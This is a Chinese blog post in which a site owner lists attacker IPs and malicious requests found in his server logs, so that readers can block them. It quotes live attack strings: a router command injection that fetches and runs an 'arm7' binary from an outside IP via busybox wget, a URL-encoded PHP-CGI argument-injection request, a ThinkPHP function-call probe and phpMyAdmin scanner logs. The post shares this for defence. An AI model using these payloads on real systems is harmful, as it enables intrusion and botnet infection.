首页 yix 

分享查日志发现的php web请求攻击

3747

2020年8月26日 更新黑名单IP列表

前些天闲着无聊,看看服务器的请求日志。真是不看不知道,一看吓一跳!

来自各地的攻击请求比访问请求多好多……

虽说限于黑客水平没造成有效攻击,但小编还是决定做一点事情。比如:将恶意IP加黑名单,写文纪念下有黑客攻击的日子。

记得上一次发现异常,是在大约一年前服务器CPU占用100%的时候。细节遗忘,只记得杀进程关端口,粗略处理后便OK了。

本文将请求来源IP及请求贴出来,方便路过的朋友加以防范。

IP

183.192.179.16 182.254.52.17 14.18.182.223  61.241.50.63 139.162.88.63
47.108.80.103 111.206.250.230 111.206.250.229 111.206.250.198 93.174.93.143
193.112.246.211 216.244.66.202 182.254.52.17 89.154.165.167 41.42.113.174 
51.254.111.118 61.162.213.225 123.185.198.200 139.199.184.166 132.145.136.225 185.142.236.34 185.234.217.231 115.238.89.35 115.236.45.236 103.85.86.195 156.225.14.140 115.236.172.148 103.93.252.117 185.142.236.34 182.88.233.222 106.45.0.117 5.188.86.218 180.76.170.52 218.95.182.135
115.236.45.236 195.54.160.21

对于这些IP,可以直接加黑名单。或许有些IP是被利用,但一并连坐。

请求


/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a

http:// xxx:xxx:xxx:xxx//myadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx//phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/pma2011/scripts/setup.php
http:// xxx:xxx:xxx:xxx/muieblackcat

92.118.161.33 - - [29/Mar/2020:05:48:22 +0800] "GET / HTTP/1.1" 200 17899 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"

http:// xxx:xxx:xxx:xxx/thinkphp/html/public/index.php
http:// xxx:xxx:xxx:xxx/TP/index.php 
http:// xxx:xxx:xxx:xxx/TP/public/index.php
http://clientapi.ipip.net/echo.php?info=1234567890
http:// xxx:xxx:xxx:xxx/portal/redlion

POST 
/boaform/admin/formPing
http://5.188.210.101/echo.php
http://xunsu.online/server-status
/data/admin/allowurl.txt
/xd.php
/robots.txt
http:// xxx:xxx:xxx:xxx/Report.docx 
http://clientapi.ipip.net/echo.php?info=1234567890
/solr/admin/info/system?wt=json
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/?XDEBUG_SESSION_START=phpstorm
/HNAP1/
/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
/statics/css/crop.css
/js/index.js
/public/simpleboot/css/simplebootadmin.css
/js/tc.js HTTP/1.1
/public/js/image.js
/wangdafa
http:// xxx:xxx:xxx:xxx/hudson
http://xunsu.online/xd.php
/hazelcast/rest/cluster
/index.php?s=/index/
/myadmin/scripts/db___.init.php
/plugins/weathermap/editor.php
/weathermap/editor.php
/Joomla/

93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:29 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:30 +0800] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /pma2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /pma2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /PMA2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /pma2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /PMA2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /PMA2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /PMA2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /pma2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin4/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin5/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin6/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:39 +0800] "GET /phpmyadmin7/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 404 219 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:41 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:42 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:43 +0800] "GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1" 404 234 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.1" 404 236 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 248 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /scripts/setup.php HTTP/1.1" 404 215 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"

POST
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

仔细观察以上请求,不难发现攻击主要分为两类,一类是针对PMA的,另一类是遍历thinphp、WordPress等开源框架和开源CMS系统的已知存在bug的文件。稍作防范,即可防御大部分攻击。

版权声明

FindFor


首发 FindFor,转载请附链接!

赞赏支持

感谢支持!


建站不易,感谢支持!

推荐阅读
libnfc安装配置(Linux)
## 1、安装依赖库 ```shell sudo apt-get install libusb-dev libpcsclite-dev libusb libpcsclite1 libccid pcscd ``` ## 2、下载libnfc 选择一个libnfc存放路径,执行git命令下载libnfc ```shell git clone https://github.com/nfc-tools/l
138
dirsearch简单使用
` dirsearch`是一个用于在Web服务器上枚举目录和文件的工具,支持多线程,具有一些启发式算法,能够识别隐藏目录。以下是使用`dirsearch`的一些基本步骤: 1. **安装dirsearch**: 首先,确保你的系统上已经安装了Python。然后,可以通过以下方式安装`dirsearch`: `git clone https://gi
33
dirb使用
`dirb`(Directory Buster)是一个用于在Web服务器上枚举目录和文件的工具。它通过发送HTTP请求并分析响应来探测目标主机上存在的目录和文件。`dirb`的主要目的是帮助安全测试人员和黑客发现目标网站上隐藏的目录,这些目录可能包含敏感信息或安全漏洞。 以下是一些`dirb`工具的基本用法和参数: 1. **基本用法**: `dirb http://targ
40
ubuntu20.04.4安装golang语言
## 1、官网下载安装包 Go下载 - Go语言中文网 - Golang中文社区 https://studygolang.com/dl ## 2、将下载下来的安装包解压到env路径下 ``` tar xf go1.18.linux-amd64.tar.gz ``` ## 3、添加环境变量 通过将Go目录的位置添加到$PATH环境变量中,系统将知道在何处可以找到Go可执行二进制文件。 ``` vim
91
升级 Linux 服务器上的 TLS 版本至 1.2 或更高版本
## 1、检查当前 TLS 版本: 首先,您需要确认当前服务器上所使用的 TLS 版本。您可以通过运行以下命令来检查 OpenSSL 版本和支持的 TLS 版本: ```shell openssl version openssl ciphers -v ``` 如果您的 OpenSSL 版本较旧,可能需要升级 OpenSSL 以支持更高的 TLS 版本。升级 OpenSSL 的具体步骤取决于您所使用
51
茶馆注册商标需要注册哪几个类别?
茶馆注册商标需要综合考虑多个方面,以下是详细介绍: ### 商标查询与评估 在进行茶馆商标注册之前,首先需要进行商标查询与评估,以确定所申请商标是否已经被他人注册或使用,避免侵权纠纷。可以通过中国国家知识产权局商标局的官方网站进行查询。 ### 明确商标注册类别 - **核心类别** - **第30类**:主要包括咖啡、茶、可可和咖啡代用品;米;食用淀粉和西米;面粉和谷类制品;面包、糕
142
咖啡馆注册商标应该注册哪几类?咖啡馆还有配套的公众号和小程序,商标是否需要追加类型?
## 咖啡馆注册商标应该注册哪几类? 咖啡馆注册商标时,需要综合考虑核心业务、相关产品及未来发展可能涉及的领域,以下为你详细介绍需要重点关注的商标类别: ### 核心经营服务类 - **第43类**:提供食物和饮料服务;临时住宿。 - **重要子类别**: - 4301 组包含咖啡馆、餐厅、自助餐厅、快餐馆等服务。咖啡馆日常经营提供饮品、餐食等服务,此类别是必须注册的核心
325
[保姆级] Vue3 开发文档
#### 获取 this `Vue2` 中每个组件里使用 this 都指向当前组件实例,this 上还包含了全局挂载的东西、路由、状态管理等啥啥都有 而 Vue3 中没有 this,如果想要类似的用法,有两种,一是获取当前组件实例,二是获取全局实例,如下自己可以去打印出来看看 ```vue import { getCurrentInstance } from 'vue' // proxy
251
【转载】树莓派时间同步方法,来自博客园
树莓派系统时间不对在《初识树莓派》一文最后一张截图中其实隐藏了一个我没有太在意的时间问题,今天在开发树莓派监控程序的时候才发现。从图中我们可以知道上次登录时间是1970年1月1日星期四的00:03:17分,由此我们可以推断,新安装系统的树莓派默认系统时间应该是1970年1月1日开始的。很明显,这个时间与我们期望的当前时间是不符的。我们需要将系统时间修改为和当前时间同步。第一步:启用网络时间协议为了
365
Web前端开发众包资源共享,探索者联盟兼职开发者招募
# 项目情况 联盟接到合作伙伴的开发需求,有一系列的APP要开发。有很多个APP哦。 ## 需求描述 1. 参考指定APP,基于H5+Vue开发页面。 2. APP并不复杂,无需使用脚手架,cdn引入开发即可。 ## 交付要求 1. 源码交付 2. 代码风格良好,可顺利二次开发 3. 只要满足代码质量要求,能正常走通业务逻辑即可,无严格的APP测试步骤。 ## 预算 具体预算看APP复杂度。目前普
575
探索互联网新机遇,加入精英社群,共创辉煌职业篇章!
【探索互联网新机遇,加入精英社群,共创未来!】 在这个日新月异的互联网时代,每一处都蕴藏着无限可能与创新机遇。我们诚邀您成为“探索者联盟”的一员,与我们一起深度剖析市场动态,精准把握行业趋势,共同开启一段激动人心的职业旅程! 加入我们,您将享受到: - **市场分析**:深度解读互联网行业最新动态,洞悉市场先机。 - **职业规划**:一对一专业指导,定制个性化职业发展路径,助力您步步高升。
336
计算机基础算法篇(二)—— 对称加密算法
##对称加密算法   在对称加密算法中,数据发信方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。收信方收到密文后,若想解读原文,则需要使用加密用过的密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数据进行加密和解密,这就要求解密方事先必须知道加密密钥。 ##常
571